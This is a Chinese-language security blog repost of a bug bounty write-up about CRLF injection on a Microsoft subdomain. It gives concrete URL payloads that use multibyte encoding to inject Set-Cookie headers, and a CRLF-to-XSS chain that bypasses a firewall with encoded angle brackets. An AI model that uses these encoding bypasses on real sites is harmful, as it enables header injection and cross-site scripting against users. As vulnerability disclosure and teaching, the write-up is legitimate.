实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

admin 2024年11月15日16:16:52评论23 views字数 790阅读2分38秒阅读模式

1.让我们测试最容易被忽视的漏洞 CRLF INJECTION

2.我尝试了一些不同的有效载荷,但我只收到“400 Bad Request”

%0D%0A%20Set-Cookie:whoami=thecyberneh%20%0D%0ASet-Cookie:whoami=thecyberneh%0A%20Set-Cookie:whoami=thecyberneh%2F%2E%2E%0D%0ASet-Cookie:whoami=thecyberneh

3.我做了很少的研究,得到了一些独特的编码,称为“GBK 编码”。所以在 URL 编码之后,我制作并尝试了一个新的payload,如下所示:

https://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=thecyberneh

实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

4.CRLF TO XSS和防火墙Bypass

ENCODING“<” --> 嘼 --> %E5%98%BC“>” --> 嘾 --> %E5%98%BEhttps://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE

实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

推荐阅读

实战 | 记一次渗透拿下某儿童色情网站的经过

实战 | 某某街一处XSS的绕过思路

实战 | 记一次企业钓鱼演练

干货 | 2022年超全的安全知识库

实战 | 实战一次完整的BC网站渗透测试

星球部分精华内容推荐

实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

其他更多精彩内容,欢迎加入我们的星球

实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

原文始发于微信公众号(HACK学习君):实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月15日16:16:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 记一次微软名人堂的6000美金赏金的漏洞挖掘https://cn-sec.com/archives/1626002.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息